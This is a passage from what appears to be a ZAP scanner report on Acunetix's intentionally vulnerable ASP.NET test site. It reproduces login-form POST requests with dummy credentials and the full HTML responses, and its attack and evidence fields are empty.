class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	__VIEWSTATEGENERATOR
Attack
Evidence
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top" align="center"> <TABLE id="Table2" cellSpacing="0" cellPadding="5" border="0" align="center" class="FramedForm"> <TR> <TD>Username:</TD> <TD align="right"> <input name="tbUsername" type="text" value="ZAP" id="tbUsername" class="Login" /></TD> </TR> <TR> <TD>Password:</TD> <TD align="right"> <input name="tbPassword" type="password" id="tbPassword" class="Login" /></TD> </TR> <TR> <TD align="left" colSpan="2"><input name="cbPersistCookie" type="checkbox" id="cbPersistCookie" checked="checked" class="classic" /> Remember me </TD> </TR> <TR> <TD></TD> <TD align="right"> <input type="submit" name="btnLogin" value="Login" id="btnLogin" /></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/login.aspx
Method	POST
Parameter	btnLogin
Attack
Evidence
Show / hide Request and Response
Request Header - size: 405 bytes.	POST http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/login.aspx Content-Length: 1161 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 1,161 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv%2BQ8XadeewSqHhJbH9z4dvJw%3D%3D&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=%2FwEWWwLoz%2FfGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM%2FuCBtd%2Bn7UP&tbUsername=ZAP&tbPassword=ZAP&cbPersistCookie=on&btnLogin=Login
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 13433
Response Body - size: 13,433 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>login</title> <meta name="vs_showGrid" content="True"> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="frmLogin" method="post" action="login.aspx" id="frmLogin"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTIyMzk2OTgxMQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ9jYlBlcnNpc3RDb29raWVzwbv+Q8XadeewSqHhJbH9z4dvJw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['frmLogin']; if (!theForm) { theForm = document.frmLogin; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="C2EE9ABB" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWwLoz/fGCgLStq24BwK3jsrkBALtuvfLDQKC3IeGDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBG0lSndyVrygwyPPM/uCBtd+n7UP" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" 